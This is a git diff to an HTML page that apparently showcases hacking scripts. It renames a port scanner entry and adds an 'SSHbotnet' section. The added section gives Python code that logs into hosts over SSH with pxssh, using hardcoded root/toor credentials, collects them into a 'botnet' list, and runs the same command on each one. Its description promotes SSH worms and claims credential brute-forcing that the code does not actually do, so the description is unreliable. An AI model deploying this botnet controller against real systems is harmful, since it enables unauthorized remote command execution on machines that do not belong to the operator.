--- a/index.html
+++ b/index.html
@@ -157,7 +157,7 @@ if __name__ == '__main__':
 						</code>
             </br>
             </pre>
-            <h2>Port scanner</h2><span> Scans and host and lists open ports. It also has a banner grabber to get information about the port. If you're going to portscan a system or a network don't use this script.Nmap is a powerful port scanning tool with lots of functionality. If you're not using nmap already then check it out at https://nmap.org/</span>
+            <h2>Port scanner/Banner Grabber</h2><span> Scans and host and lists open ports. It also has a banner grabber to get information about the port. If you're going to portscan a system or a network don't use this script.Nmap is a powerful port scanning tool with lots of functionality. If you're not using nmap already then check it out at https://nmap.org/</span>
             <code class="cpp">
                 <h3> Usage: python portscanner.py -h 10.10.10.10 -p 22 80 443  </h3>
             </code>
@@ -214,6 +214,60 @@ def main():
 
     if __name__ == '__main__':
         main()
+                        </code>
+            </pre>
+            </br>
+
+            </br>
+            </pre>
+            <h2>SSHbotnet</h2><span> SSH worms have proven to be very successfull. This ssh worm brute forces user credentials against a tagret. Because SSH clients require some user itneraction, such as adding the RSA fingerprint to the list of known hosts we need to use a third party module called "pexpect" that allows the script to wait for an output and respond accordingly </span>
+            <code class="cpp">
+                <h3> Usage: python ssh_botnet.py  </h3>
+            </code>
+            <pre>
+						<code class="c">
+import pxssh
+
+class Client:
+    def __init__(self, host, user, password):
+        self.host = host
+        self.user = user
+        self.password = password
+        self.session = self.connect()
+
+    def connect(self):
+        try:
+            ssh = pxssh.pxssh()
+            ssh.login(self.host, self.user, self.password)
+
+            return ssh
+        except Exception:
+            print ('[-] Error Connecting' )
+            print (Exception)
+
+    def send_command(self, cmd):
+        self.session.sendline(cmd)
+        self.session.prompt()
+
+        return self.session.before
+
+def botnet_command(command, botnet):
+    for client in botnet:
+        output = client.send_command(command)
+        print('[*] Output from ' + client.host )
+        print ('[+] ' + output + '\n')
+
+def add_client(host, user, password, botnet):
+    client = Client(host, user, password)
+    botnet.append(client)
+
+def main():
+    botnet = []
+    add_client('10.10.10.110', 'root', 'toor', botnet)
+    botnet_command('uname -v', botnet)
+
+if __name__ == '__main__':
+    main()
                         </code>
             </pre>
             </br>
